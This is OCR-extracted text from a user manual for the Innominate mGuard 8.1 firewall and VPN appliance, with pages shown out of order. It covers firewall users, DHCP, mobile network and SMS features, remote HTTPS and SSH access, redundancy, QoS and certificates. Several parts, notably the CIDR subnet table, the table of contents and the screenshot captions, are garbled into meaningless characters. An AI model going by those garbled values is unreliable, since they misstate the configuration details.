93. login session could then be used by an intruder who uses this old IP address of the authorized user and accesses the mGuard using this sender address The same thing could also occur if an authorized firewall user forgets to log out at the end of a session This hazard of logging in via an unsecure interface is not completely eliminated but the time is limited by setting the configured timeout for the user firewall template used See Timeout type on page 227 186 Innominate Security Technologies 105661_en_02 Authentication menu Authentication gt gt Firewall Users gt gt Access 1 2 105661 _en_02 Interface External Internal External 2 Dial in DMZ2 Specifies which mGuard interfaces can be used by firewall users to log into the mGuard For the interface selected web access via HT TPS must be enabled Management Web Set tings menu Access tab page see Access on page 57 In Stealth network mode both the Internal and External interfaces must be enabled so that fire wall users can log into the mGuard Two rows must be entered in the table for this External 2 and Dial in are only for devices with a serial interface see Network gt gt Interfaces on page 105 DMZ is only for devices with a DMZ interface 7 2 3 Status When the user firewall is activated its status is displayed here Authentication Firewall Users Firewall Users Access Status Status
94. mGuard rs4000 rs2000 mGuard delta mGuard pci SD mGuard pcie SD insert the SD card into the SD slot at the front e If the root password on the mGuard onto which the profile is going to be subsequently loaded is not root this password must be entered in the The root password to save to the ECS field e Click on Save For EAGLE mGuard the LED STATUS and LED V 24 flash until the saving process is complete Loading a profile from an external storage medium e EAGLE mGuard connect the ECS to the V 24 socket ACA11 or USB socket ACA21 Type ACA21 ECS are not suitable for manual modifications by a computer or similar e mGuard centerport and EAGLE mGuard with USB interface insert the USB stick into the USB socket e mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard delta mGuard pci SD mGuard pcie SD insert the SD card into the SD slot at the front e Once the storage medium has been inserted start the mGuard e The mGuard root password must either be root or correspond to the password that was specified while the profile was being saved For EAGLE mGuard the LED STATUS and LED V 24 flash until the saving process is complete The configuration profile loaded from the storage medium is loaded onto the mGuard and applied 78 Innominate Security Technologies 105661_en_02 Management menu The loaded configuration profile does not appear in the list of configuration profiles stored on the mGuard
95. network provider Only visible when PPP authentication is set to Yes Enter the PAP or CHAP user password to log onto the access gateway of the mobile network provider This information can be obtained from your mobile network provider Only visible when PPP authentication is set to Yes See Primary SIM slot Indicates the duration in hours until the device switches to back to SIM 1 from SIM 2 If set to 0 SIM 2 remains active until the device dials into the mobile network again Values 0 24 hours 105661_en_02 Network menu 6 7 3 Text message Notifications The mGuard rs4000 rs2000 3G can send and receive text messages Text messages can be sent via the following mechanisms Web interface Console Text messages can be sent to freely definable mobile network recipients for selectable events A complete list of all events can be found at Event table on page 53 You can also send an text message via the console To do so you must enter the recipient number followed by a space and then add the message Packages mguard api_O mbin action gsm sms lt recipient number gt lt message gt Incoming text messages can be used to control VPN connections Network Mobile Network General SIM Settings Text message Notifications Positioning system Text message notifications number a m Activation state of a Firewall rule record None A changed to WV Ple
96. on the LAN adapter icon and select Properties from the context menu e On the General tab select Internet Protocol TCP IP under This connection uses the following items then click on Properties e Make the appropriate entries and settings in the Internet Protocol Properties TCP IP dialog box 6 5 1 Internal External DHCP Network DHCP Internal DHCP External DHCP Mode DHCP mode Disabled M Disabled Server Relay 162 Innominate Security Technologies 105661_en_02 Network gt gt DHCP gt gt Internal DHCP Mode DHCP mode DHCP mode Network menu Disabled Server Relay Set this option to Server if the mGuard is to operate as an in dependent DHCP server The corresponding setting options are then displayed below on the tab page See Server Set this option to Relay if the mGuard is to forward DHCP re quests to another DHCP server The corresponding setting options are then displayed below on the tab page see Relay In mGuard Stealth mode Relay DHCP mode is not supported If the mGuard is in Stea th mode and Relay DHCP mode is selected this setting will be ignored However DHCP requests from the computer and the corresponding responses are forwarded due to the nature of Stealth mode If this option is set to Disabled the mGuard does not answer any DHCP requests Server If DHCP mode is set to Server the corresponding setting options
97. packets are actually to be transferred It also instructs the modem to terminate the tele phone connection as soon as no more network packets are to be transmitted for a specific time see value in dle timeout field By doing this however the mGuard is not constantly available externally i e for incoming data packets Innominate Security Technologies 133 mGuard 8 1 Network gt gt Interfaces gt gt Dial out a The mGuard also often or sporadically establishes a connection via the mo dem or keeps a connection longer if the following conditions apply Often the mGuard is configured so that it synchronizes its system time date and time regularly with an external NTP server Sporadically the mGuard acts as a DNS server and must perform a DNS request for a client After a restart an active VPN connection is set to Started If this is the case the mGuard establishes a connection after every restart After a restart for an active VPN connection the gateway of the partner is specified as the host name After a restart the mGuard must request the IP address that corre sponds to the host name from a DNS server Often VPN connections are set up and DPD messages are sent regularly see Dead Peer Detection on page 282 Often the mGuard is configured to send its external IP address regularly to a DNS service e g DynDNS so that it can still be accessed via its host name
98. parity 2 stop bits odd parity COM Server Allowed Net Access rules can be defined for the COM server to prevent unauthorized access to it goi The default rule does not allow any access via the external interface From IP 0 0 0 0 0 means all IP addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Routing on page 24 Interfaces Interface for which the rule should apply Values None External DMZ VPN Action Accept means that the data packets may pass through Reject means thatthe data packets are sent back The sender is informed of their rejection Drop means that the data packets are not permitted to pass through The sender is not informed of their whereabouts Comment Freely selectable comment for this rule Log For each firewall rule you can specify whether the event is to be logged if the rule is applied 144 Innominate Security Technologies 105661_en_02 Primary External Interface Secondary External Inter face PPP dial in options 105661_en_02 Network menu For the mGuard industrial rs with built in modem built in ISDN modem ISDN termi nal adapter The mGuard industrial rs is available with a built in analog modem built in ISDN terminal adapter as an option The built in modem or built in ISDN terminal adapter can be used as follows As a primary external interface if the network mode is set to Built in Modem under Network gt gt Interfaces on the Gener
99. queries from client programs or client computers In data communication the computer establishing a connection to a server or host is also called a client In other words the client is the calling computer and the server or host is the computer called In the IP transmission protocol data is sent in the form of data packets These are known as IP datagrams An IP datagram is structured as follows IP header TCP UDP ESP etc header Data payload The IP header contains The IP address of the sender source IP address The IP address of the recipient destination IP address The protocol number of the protocol on the superordinate protocol layer according to the OSI layer model The IP header checksum used to check the integrity of the received header The TCP UDP header contains the following information The port of the sender source port The port of the recipient destination port Achecksum covering the TCP header and information from the IP header e g source and destination IP addresses If a computer is connected to a network the operating system creates a routing table inter nally The table lists the IP addresses that the operating system has identified based on the connected computers and the routes available at that time Accordingly the routing table contains the possible routes destinations for sending IP packets If IP packets are to be sent the computer s operating system comp
100. rules are ignored The rules specified here only take effect if Enable HTTPS remote access is set to Yes Internal access is also possible when this option is set to No A firewall rule that would re fuse Internal access does therefore not apply in this case The following options are available From IP Interface 105661_en_02 Enter the address of the computer or network from which re mote access is permitted or forbidden in this field Specifies to which interface the rule should apply Specify the access options according to your requirements If you want to refuse access via Internal VPN or Dial in you must implement this explicitly by means of corresponding firewall rules for example by specifying Drop as an action To prevent your own access being blocked you may have to permit access simultaneously via another interface explicitly with Accept be fore clicking on the Apply button to activate the new setting Otherwise if your access is blocked you must carry out the recovery proce dure Innominate Security Technologies IP address 0 0 0 0 0 means all addresses To specify an ad dress area use CIDR format see CIDR Classless Inter Do main Routing on page 24 External Internal External 2 VPN Dial in If no rules are set or if no rule applies the following default set tings apply HTTPS access is permitted via Internal VPN and Dial in Ac cess via External and External 2 is refused
101. see Authentication gt gt Certificates If the use of revocation lists CRL checking is activated under the Authentication gt gt Cer tificates Certificate settings menu item each certificate signed by a CA that is shown by SSH clients is checked for revocations Management gt gt System Settings gt gt Shell Access CA certificate This configuration is only necessary if the SSH client shows a certificate signed by aCA All CA certificates required by the mGuard to form the chain to the relevant root CA certificate with the certificates shown by the SSH client must be configured The selection list contains the CA certificates that have been loaded on the mGuard under the Authentication gt gt Certifi cates menu item X 509 subject Enables a filter to be set in relation to the contents of the Sub ject field in the certificate shown by the SSH client It is then possible to limit or enable access for SSH clients which the mGuard would accept based on certificate checks Limited access to certain subjects i e individuals and or to subjects that have certain attributes or Access enabled for all subjects See glossary under Sub ject certificate on page 360 a The X 509 subject field must not be left empty 105661_en_02 Innominate Security Technologies 49 mGuard 8 1 Management gt gt System Settings gt gt Shell Access Access enabled for all subjects i e ind
102. system time field Synchronized by file system time stamp The administrator has set the Time stamp in filesystem setting to Yes and has either transmitted the current system time to the mGuard via NTP see below under NTP Server or has entered it under Local system time The system time of the mGuard is then synchronized using the time stamp after a restart even if it has no built in clock and is set exactly again after wards via NTP Synchronized by Network Time Protocol NTP The administrator has activated NTP time synchronization under NTP Server has entered the address of at least one NTP server and the mGuard has established a connection with at least one of the specified NTP servers If the network is working correctly this occurs a few seconds after a restart The display in the NTP State field may only change to synchronized much later see the explanation below under NTP State Synchronized by GPS data The mGuard rs4000 rs2000 3G can set and synchro nize the system time via the positioning system GPS GLONASS under Network gt gt Mobile Network gt gt Positioning system 105661_en_02 Innominate Security Technologies 37 mGuard 8 1 Management gt gt System Settings gt gt Time and Date NTP Server Local system time Timezone in POSIX 1 notation Time stamp in filesystem Here you can set the time for the mGuard ifno NTP server has been set up or the NTP server cannot be
103. targets for ICMP echo requests If at least one target must respond or all targets of one set must respond is selected under External interface gt gt Kind of check then External interface gt gt Primary targets for ICMP echo requests cannot be left empty This also applies to the internal interface In Router network mode at least one external and one internal virtual IP address must be set A virtual IP address cannot be listed twice 334 Innominate Security Technologies 105661_en_02 105661_en_02 Redundancy 16 1 5 Fail over switching time The mGuard calculates the intervals for the connectivity check and availability check auto matically according to the variables under Fail over switching time Connectivity check The factors which define the intervals for the connectivity check are specified in Table 16 1 on Page 335 64 kbyte ICMP echo requests are sent for the connectivity check They are sent on layer 3 of the Internet protocol When VLAN is not used 18 bytes for the MAC header and check sum are added to this with the Ethernet on layer 2 The ICMP echo reply is the same size The bandwidth is also shown in Table 16 1 This takes into account the values specified for a single target and adds up the bytes for the ICMP echo request and reply The timeout on the mGuard following transmission includes the following The time required by the mGuard to transmit an ICMP echo reply If other data traffic
104. that a browser on the remote computer is used to configure the mGuard This option is disabled by default NOTE If remote access is enabled ensure that secure passwords are defined for root and admin To enable HTTPS remote access make the following settings 105661_en_02 Innominate Security Technologies 57 mGuard 8 1 Management gt gt Web Settings gt gt Access HTTPS Web Access Enable HTTPS remote Ifyou want to enable HTTPS remote access set this option to access Yes No Yes Internal HTTPS remote access i e from the directly connected LAN or from the directly connected computer can be enabled independently of this setting The firewall rules for the available interfaces must be defined on this page under Allowed Networks in order to specify dif ferentiated access options on the mGuard In addition the authentication rules under User authentica tion must be set if necessary Remote HTTPS TCP Default 443 Port remote administration only If this port number is changed the new port number only ap plies for access via the External External 2 VPN and Dial in interface Port number 448 still applies for internal access The remote partner that implements remote access may have to specify the port number defined here after the IP address during entry of the address Example if this mGuard can be accessed over the Internet via address 123 124 125 21 and port number 443 has been specified for remote
105. the connection fails The primary mGuard becomes active again after the failure has been rectified The secondary mGuard receives a presence notification CARP and returns to standby mode State synchronization If the primary mGuard becomes active again after a failure of the internal network connec tion it may contain an obsolete copy of the firewall database This database must there fore be updated before the connection is reestablished The primary mGuard ensures that it receives an up to date copy before becoming active 16 1 8 Interaction with other devices Virtual and actual IP addresses With firewall redundancy in Router network mode the mGuard uses actual IP addresses to communicate with other network devices Virtual IP addresses are used in the following two cases Virtual IP addresses are used when establishing and operating VPN connections If DNS and NTP services are used according to the configuration they are offered to internal virtual IP addresses The usage of actual management IP addresses is especially important for the connectivity check and availability check Therefore the actual management IP address must be con figured so that the mGuard can establish the required connections The following are examples of how and why mGuard communication takes place Communication with NTP servers to synchronize the time Communication with DNS servers to resolve host names especially those from
106. this causes an ex pired session to be detected and removed after six minutes In previous versions the preset was 0 This means that no requests for a sign of life are sent If it is important not to generate additional traffic you can ad just the value When the setting O is made in conjunction with Concurrent Session Limits subsequent access may be blocked if too many sessions are interrupted but not closed as a result of network errors 105661_en_02 Management gt gt System Settings gt gt Shell Access Concurrent Session Limits Maximum number of missing signs of life Update SSH and HTTPS keys Management menu Specifies the maximum number of times a sign of life request to the partner may remain unanswered For example if a sign of life request should be made every 15 seconds and this value is set to 3 the SSH connection is de leted if a sign of life is still not detected after approximately 45 seconds Generate new 2048 bit keys Keys that have been generated using an older firmware might be weak and should be renewed e Click on this button to generate a new key e Observe the fingerprints of the new keys generated e Login via HTTPS and compare the certificate information provided by the browser In the case of administrative access to the mGuard via SSH the number of simultaneous sessions is limited depending on the predefined user Approximately 0 5 Mbytes of mem ory spac
107. which sounds should be emitted by the mGuard speaker and at what volume 105661_en_02 Network menu For the mGuard industrial rs with built in ISDN terminal adapter External Modem Hardware handshake priors O _Y Baudrate 57600 Handle modem transparently for dial in only Modem init string d dATH OK Built in Modem ISDN Additionally for the ee mGuard industrial rs 2nd MSN with built in modem ISDN protocol EurolSDN NET3 v l SD N Layer 2 protocol PPP ML PPP w Network gt gt Interfaces gt gt Modem Console for the mGuard industrial rs with ISDN terminal adapter External Modem As for the mGuard rs4000 mGuard industrial rs without built in modem mGuard centerport mGuard blade mGuard delta EAGLE mGuard Configuration as above for External Modem see External Modem on page 141 Built in Modem ISDN 1st MSN For outgoing calls the mGuard transmits the MSN Multiple Subscriber Number entered here to the called partner In ad dition the mGuard can receive incoming calls via this MSN provided dial in operation is enabled see General tab page Maximum of 25 alphanumeric characters the following spe cial characters can be used colon 2nd MSN If the mGuard should also receive incoming calls via another number for dial in operation if enabled enter the second MSN here ISDN protocol The EurolSDN protocol also Known as NETS is used in Ger many and many other European countr
108. 0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 192 168 1 0 255 255 255 0 corresponds to CIDR 192 168 1 0 24 CIDR 32 Shl 30 AS 28 ZT 26 22 24 23 22 21 20 La 18 y m e U1 OF PRP PP OorFN Ww e O M WS Nn oy 105661 _en_02 Configuration help 2 6 Network example diagram The following diagram shows how IP addresses can be distributed in a local network with subnetworks which network addresses result from this and how the details regarding ad ditional internal routes may look for the mGuard Internet External address e g 123 456 789 211 assigned by the Internet service provider mGuard in Router network mode Internal address of the mGuard 192 168 11 1 Switch Network A Network address 192 168 11 0 24 _ Subnet mask 255 255 255 0 Router Router External IP address 192 168 11 2 Internal IP address 192 168 15 254 Subnet mask 255 255 255 0 Switch Network B Network address 192 168 15 0 24 Subnet mask 255 255 255 0 Router External IP address 192 168 15 1 AA Outer Internal IP address EER Switch 192 168 27 254 Network C Subnet mask La Lo Network address 255 255 255 0 192 168 27 0 24 _ adcitional internal routes C 2 3 Subnet mask 255 255 255 0 Network A Computer A1 A2 A3 A4 A5
109. 0 0 0 0 0 any 0 0 0 0 0 any TOS Minimize Delay w Unchanged v Urgent v rimaj v 0 0 0 0 0 any 0 0 0 0 0 any TOS Maximize Reliability Unchanged v important v 3 a v 000 00 any 0 0 0 0 0 any TOS Minimize Cost v Unchanged v Low Priority v VPN via External settings for egress queue rules QoS Egress Rules VPN VPN via Internal VPN via External VPN via External 2 VPN via Dial in Default gt x OC eT or Current TOSIDSCF New TOSIDSCF F v 0 0 0 0 0 0 0 0 0 0 any TOS Minimize Delay v Unchanged Y Urgent v 2 v 0 0 0 0 0 0 0 0 0 0 any TOS Maximize Reliability w Unchanged v important w 3 ar v 000 00 0 0 0 0 0 any TOS Minimize Cost v Unchanged Low Priority v VPN via External 2 settings for egress queue rules QoS Egress Rules VPN VPN via Internal VPN via External VPN via External 2 VPN via Dial in Default PEF Leroa rromi rompon to O f Toron current Tospsce New TOSDSCP p 1 Al v 0 0 0 0 0 any 0 0 0 0 0 any TOS Minimize Delay v Unchanged v Urgent v p 2 wv 0 0 0 0 0 any 0 0 0 0 0 any TOS Maximize Reliability ow Unchanged v Important v FEH a v 000 00 any 0 0 0 0 0 any TOS Minimize Cost v Unchanged v Low Priority v VPN via Dial in settings for egress queue rules QoS Egress Rules VPN VPN via Internal VPN via External VPN via External 2 VPN via Dial in Default Def
110. 0 or later If a maximum of three requests for a sign of life are issued this causes an ex pired session to be detected and removed after six minutes In previous versions the preset was 0 This means that no requests for a sign of life are sent Please note that sign of life requests generate additional traf fic Specifies the maximum number of times a sign of life request to the partner may remain unanswered For example if a sign of life request should be made every 15 seconds and this value is set to 3 then the SEC Stick client connection is de leted if a sign of life is not detected after approximately 45 sec onds Concurrent session limits The number of simultaneous sessions is limited for SEC Stick connections Approxi mately 0 5 Mbytes of memory space is required for each session to ensure the maximum level of security The restriction does not affect existing sessions it only affects newly established connec tions Maximum number of cumulative concur rent sessions for all users Maximum number of concurrent sessions for one user 105661_en_02 O to 2147483647 Specifies the number of connections that are permitted for all users simultaneously When 0 is set no session is permitted O to 2147483647 Specifies the number of connections that are permitted for one user simultaneously When 0 is set no session is permitted Innominate Security Technologies 289 mGuard 8 1 SEC Sti
111. 1 Innominate Security Technologies mGuard 8 1 Network gt gt Mobile Network gt gt General Mobile Network Supervi You can use the following probe targets to check whether data can actually be transmitted sion with an active mobile network connection with packet data transmission To do so probe targets hosts are pinged at specific intervals to see whether at least one of the targets can be reached If the defined targets cannot be reached after specified in tervals the mobile network connection is reestablished If SIM cards are available the supervision runs as follows lfa probe target was reached the connection to the provider of the SIM 1 card is maintained _ Ifnone of the probe targets could be reached the connection switches to the provider of the other SIM card Ifthe SIM 2 connection was active it switches back to SIM 1 This ensures that SIM 1 is used primarily The mobile network connection is also monitored The mobile network modem is re started if an AT command times out timeout 30 seconds Probe status Indicates whether supervision is activated Supervision is only activated under the following conditions SIM card inserted PIN correctly entered Router mode or network mode set to Built in mobile net work modem APN correctly entered PPP authentication correctly stored 172 Innominate Security Technologies 105661_en_02 Network gt gt Mobile Netwo
112. 1 1 imporlable Sliate s s 2 isiesssc tee Bae eeetsiaestees eee eadeaene 230 9 2 CIFS Integrity Monitoring gt gt CIFS Integrity Checking cccceseeeeeeeeeeeeeeeeeees 232 9 2 1 CUMING eenen ecuace cssasqendeneclaatnaamuscacaiaansenacasatcasatoses emaniccaaeiaceeense 233 9 2 2 Filename Patterns acie tekdsctu ds candshccenenxteneeenean tds euedeataned ete 240 9 3 CIFS Integrity Monitoring gt gt CIFS AV Scan COnnector cccceeeeeeeeeteeeeeeeees 242 9 3 1 CIFS Antivirus Scan Connector ccccscceeeeceesseeeeseeseeeeseeeeeessaees 242 105661_en_02 Innominate Security Technologies T mGuard 8 1 10 IPsec VPN men 10 2 11 SEC Stick menu 12 QoS meni 0 000e 12 3 12 4 13 Redundancy menu 13 2 13 3 14 Logging menu 8 Innominate Security Technologies PEER cede atte TAE ne tae EEA A ten teas deat home arnt lone anes 24 7 IPSEC VRN gt z GIOD al sien aAA o A A 247 TOTI OPIONS soiien a eee 247 TOs DYMDNS M NHONNG ret ere ER 253 IPSEC VPN S gt CONMECTIONS eir a a T 254 T02 GOMMECTIONS diiri E a aAa 255 1022 SGC I n a D 257 1O23 Authenicalon s a a a a8 ean eee el a I Bee aS 269 TOG JIFIFCWAll aicticsniteanidaontttarestdentnicacnieninbicadseasssieadeederatnndecaiteiatebasbicnestancnsdes 276 T029 IKE OOUOMS cicsscsens cata cocit aicee N E E NS 279 IPsec VPN gt gt L2TP over IPSEC merana EE 284 OSA C2TP SEN
113. 250 frames s mGuard smart mGuard core mGuard pci SD mGuard delta l Bidirectional includes traffic in both directions For example 1500 Mbps means that 750 Mbps is forwarded in each direction Fail over switching time The fail over switching time can be set to 1 3 or 10 seconds in the event of errors The upper limit of 1 second is currently only adhered to by the mGuard centerport even under high load 105661_en_02 Innominate Security Technologies 343 mGuard 8 1 344 16 1 10 Limits of firewall redundancy Innominate Security Technologies In Router network mode firewall redundancy is only supported with the static mode Access to the mGuard via the HTTPS SNMP and SSH management protocols is only possible with an actual IP address from each mGuard Access attempts to virtual addresses are rejected The following features cannot be used with firewall redundancy Asecondary external Ethernet interface ADHCP server ADHCP relay ASEC Stick server A user firewall CIFS Integrity Monitoring The redundant pair must have the same configuration Take this into account when making the following settings NAT settings masquerading port forwarding and 1 1 NAT Flood protection Packet filter firewall rules MAC filter advanced settings Queues and rules for QoS Some network connections may be interrupted following a network lobotomy See Restoration in the ev
114. 26 ree 2011 10 27_11 31 47 17361 011 10 27_11 31 47 17412 2011 10 27_11 31 47 17464 i2011 10 27_11 31 47 17517 2011 10 27_11 31 47 17561 011 10 27_11 31 47 17583 2011 10 27_11 31 47 54001 011 10 27_11 31 47 54021 011 10 27_11 31 47 54395 2011 10 27_11 31 47 54415 2011 10 27_11 31 47 _ 54515 011 10 27_11 31 53 18334 011 10 27_11 31 53 18360 2011 10 27_11 31 53 18360 011 10 27_11 31 S53 21334 2011 10 27_11 31 53 21357 011 10 27_11 31 53 21377 er 011 10 27_11 31 53 21397 er 2011 10 27 11 31 53_ 21416 Common CIFS Integrity Checking Jump to firewall rule Logging menu 14 2 Logging gt gt Browse local logs ham ssv INFO transitioned to state active ham vsr INFO terminating ham ssv NOTICE EOF from component ham ssv INFO transitioned to state active_waiting ham ssv NOTICE EOF from component ham vsr INFO ham vsr 2877 terminated ham fsr INFO terminating ham fsr INFO ham tsr 29322 terminated ham fsr INFO ham fsr 3453 starting ham fsr INFO started ham fsr INFO entering sending mode ham vsr INFO ham ws2r 3459 starting ham vsr INFO started ham vsr INFO entering sending mode ham ssv INFO transitioned to state active beron beron exec root CMD cifsscan start_scan r MAI2011736741 beron Subject Cron lt root mguard cessmann gt cifsscan start_scan r MAI2011736741 beron beron OK ham ssv INFO transitioned to state faulty
115. 358 The components of IPsec are the Authentication Header AH the Encapsulat ing Security Payload ESP the Security Association SA and the Internet Key Exchange IKE At the start of the session the systems involved in communication must determine which technique should be used and the implications of this choice e g Transport Mode or Tun nel Mode In Transport Mode an IPsec header is inserted between the IP header and the TCP or UDP header respectively in each IP datagram Since the IP header remains unchanged this mode is only suitable for host to host connections In Tunnel mode an IPsec header and a new IP header are prefixed to the entire IP data gram This means the original datagram is encrypted in its entirety and stored in the payload of the new datagram Tunnel Mode is used in VPN applications the devices at the ends of the tunnel ensure that the datagrams are encrypted decrypted in other words the actual datagrams are com pletely protected during transfer over a public network In a certificate confirmation is provided by a certification authority CA that the certificate does actually belong to its owner This is done by confirming specific owner properties Fur thermore the certificate owner must possess the private key that matches the public key in 360 Innominate Security Technologies 105661_en_02 105661_en_02 Glossary the certificate X 509 certificate on page 363 Example
116. 5661_en_02 IPsec VPN gt gt Connections gt gt Edit gt gt General Options 105661_en_02 Interface to use for gateway setting any IPsec VPN menu Internal External External 2 Dial in DMZ Implicitly se lected by the IP address specified to the right External 2 and Dial in are only for devices with a serial inter face see Network gt gt Interfaces on page 105 Selection of the Internal option is not permitted in Stealth mode This interface setting is only considered when any is en tered as the address of the VPN gateway on the partner In this case the interface of the mGuard through which it answers and permits requests for the establishment of this VPN con nection is set here The VPN connection can be established through the LAN and WAN port in all Stealth modes when External is selected The interface setting allows encrypted communication to take place over a specific interface for VPN partners without a known IP address If an IP address or host name is entered for the partner then this is used for the implicit assignment to an interface The mGuard can be used as a single leg router in Router mode when Internal is selected as both encrypted and de crypted VPN traffic for this VPN connection is transferred over the internal interface IKE and IPsec data traffic is only possible through the primary IP address of the individual assigned interface This also ap plies to VPN con
117. Active Inactive Disabled Determines the output state of the firewall rule record following a reconfiguration or restart The Active Inactive setting is only applicable if a push button is connected In case the firewall rule records are controlled via a switch or VPN connection they have priority If set to Disabled the firewall rule record cannot be dynami cally activated It is retained but has no influence Controlling service Service input CMD 1 3 VPN connection input oe PENER The firewall rule record can be switched via a push but meee a ton switch or a VPN connection The push button switch must be connected to one of the ser vice contacts CMD 1 3 Token for text mes Only available with the mGuard rs4000 3G sage trigger Incoming text messages can be used to activate or deactivate firewall rule records The text message must contain the fwrules active or fwrules inactive command followed by the token Deactivation Timeout Activated firewall rule records are deactivated after this time has elapsed O means the setting is switched off Time in seconds 0 to 86400 1 day Firewall rules ESS eroico rome O romeo OO roe toro acion comment tog 1 TCP 0 0 0 0 0 any 0 0 0 0 0 any Accept v No w 2 TCP 0 0 0 0 0 any 0 0 0 0 0 any Accept No Protocol All means TCP UDP ICMP GRE and other IP protocols From IP 0 0 0 0 0 means all IP addresses To specify an address area use CIDR
118. C Stick connection the Enabled option must be set to Yes User Name An SEC Stick connection with a uniquely assigned user name must be defined for every owner of a SEC Stick who has au thorized access This user name is used to uniquely identify the defined connections Name Name of the person Company Name of the company The following page appears when you click on Edit SEC Stick Connections nobody SEC Stick connections General Comment Contact A descriptive name of the user Company myCompany SSH public key including ssh dss or ssh rsa SSH Port Forwarding gt x EE es Port FE 192 168 47 11 3389 General Enabled As above User Name As above Comment Optional comment text Contact Optional comment text A descriptive name of Optional name of the person repeated the user 105661_en_02 Innominate Security Technologies 291 mGuard 8 1 SEC Stick gt gt Connections gt gt SEC Stick connections Company Optional As above SSH public key Enter the SSH public key belonging to the SEC Stick in ASCII including ssh dss or formatin this field The secret equivalent is stored on the SEC ssh rsa Stick SSH Port Forwarding List of allowed access and SSH port forwarding relating to the SEC Stick of the corresponding user IP IP address of the computer to which access is enabled Port Port number to be used when accessing the computer 292 Innominate Security Technologies 105661_en_02 QoS m
119. CP w 0 0 0 0 0 any 0 0 0 0 0 any Drop v No These rules specify which traffic from the outside is allowed to pass to the inside Please note Port settings are only meaningful for TCP and UDP Log entries for unknown connection attempts Yes v Network Security gt gt Packet Filter gt gt Incoming Rules Incoming Lists the firewall rules that have been set up They apply for incoming data links that have been initiated externally If no rule has been set the data packets of all incoming connections excluding VPN are dropped default settings General firewall set Accept all incoming connections the data packets of all in ting coming connections are allowed Drop all incoming connections the data packets of all in coming connections are discarded Accept Ping only the data packets of all incoming connec tions are discarded except for ping packets ICMP This set ting allows all ping packets to pass The integrated protection against brute force attacks is not effective in this case Use the firewall ruleset below displays further setting op tions This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000 The following settings are only visible if Use the firewall ruleset below is set Interface External External 2 Any External Specifies via which interface the data packets are received so thatthe rule applies to them Any External refers to the Exter na
120. CRL certificate revocation list and checks whether or not the certificates that are available to the mGuard are blocked CRLs are issued by the CAs and contain the serial numbers of blocked certificates e g certificates that have been reported stolen On the CRL tab page see CRL on page 203 specify the or igin of the mGuard revocation lists a When CRL checking is enabled a CRL must be configured for each issuer of certificates on the mGuard Missing CRLs result in certificates being considered invalid a Revocation lists are verified by the mGuard using an appropriate CA certificate Therefore all CA certificates that belong to a revocation list all sub CA certificates and the root certificate must be imported on the mGuard If the validity of a revo cation list cannot be proven it is ignored by the mGuard If the use of revocation lists is activated together with the consideration of validity periods revoca tion lists are ignored if based on the system time their validity has expired or has not yet started If Enable CRL checking is set to Yes see above select the time period after which the revocation lists should be down loaded and applied On the CRL tab page see CRL on page 203 specify the or igin of the mGuard revocation lists If CRL checking is enabled but CRL download is set to Never the CRL must be manually loaded on the mGuard so that CRL checking can be performed
121. Do rioto 20 Ga Oe POD eee 8 2o ABe 0 eat 200 240 0 0 ZID TAs 0 8 230 6 1920H Z509 128 80 755 O 0 0 Ze Os 0x0 252s Os Bal Z46 0 0 0 240 0 0 0 224 0 0 0 192 0 5 0 128 0 0 0 Example 24 Innominate Security Technologies J O Go Ge G so a co i2oD 254 Fo Ps 248 240 224 182 128 Binary j ga ai iki d 1171 CEOE TLI LELLI III LA DI LLL sia Wes Ba eB eS lige al es lig ie i te ie as Bs We VAL ere 1148 CTET Li vee Wo WBS A I AA TILL ca Bes Ee te al le Ee ie a A eB I Was es eH ligt es Bot Wis Me 8 EANTA 115 ae te Ea OAA Aa DN A es 9 i Me I LA LILLIA yas Bia Be se S ge le eB ces Got i es DB E A i a LLO TTL LOS 11111000 11110000 11100000 11000000 10000000 De Ai a i jt Le LELLLLLIL 12402071 12a TTT RATT ARLE ELL ASELDEITAL Laser ee lB Lee LLLLILLL LDL 121 TTITI11 RSET ce Oe a De BI ASLO 11111100 11111000 11110000 11100000 11000000 10000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 PTATL 119 ia A A BERYL LLLLELLI MARA LAS sol i i ho EL eee VAD LIS LL PIAA Te 11111199 11111000 11110000 11100000 11000000 10000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 ue hi igh id a Ml ls LLL Tp 11111099 11110000 11100000 11000000 10000000 00000000 00000000 00000000 00000000 00000000 0000000
122. EN akira an ie asa ialetwes isa A N 284 IPsec VPN S gt IPs60 StatUS sccccostsccsarssaciadcsieacsanacanitesanciedatenanciedeataaienanensaatences 285 LE EE AIET EATE EEE A A E A PEO EA E E E I T 287 Gopal aeaa e S A S E 288 CONNECHONS prsesia enoia one aaea a aa O T 291 EAO E TE AEA PES AE EE A A A AE E E TEA 293 moresS Fie Sini a a E O 293 IZ nterna EXtErnal irrien eaaet 293 EGQleSS QUEUES oon e E a R 296 12 2 1 Internal External External 2 Dial in cccccccceeeeceeeeeeeeeeseeseeeeeeeeees 296 Egress Queues VPN ccccccsssseeeeceeceesseeceeceeeeueeeeecseaaueeeeeeseeaseeeeesessegeeseesenaas 298 12 3 1 VPN via Internal VPN via External VPN via External 2 VPN via Dial in 298 Egress RUIGSE annn a dena tensu seaman reaacteae 301 12 4 1 Internal External External 2 Dial in cccccccccseeeeeeeeeeneeeeeeeseeeeseeetees 301 1242 Egress RUGS VPN ssena certian cones asia a itecd eee 302 ARERI VEE AE A EEE ese ste chances TE ETEA eat ae aca ae ane E 305 Redundancy gt gt Firewall Redundancy cccccccecseeeeceeeeeeeeeeeeeeeeeeseeeeaeeeeesaees 305 WI Bedundanty voxel aulenateetontea rele rienestead teem ideaslea iad cee cnn eai case esta 305 tote COMMEGHVIN CHECKS arenae dans aleete a 313 Redundancy gt gt FW Redundancy StatuS cccccccssececeeeeeceeeeseeeeeeseeeeseaeees 315 13 2 1 Redundancy Status ssec ona a ee ee 315 1322 CONNECTIVITY Stals riiin a a 318 Ring Network Coupling nieras
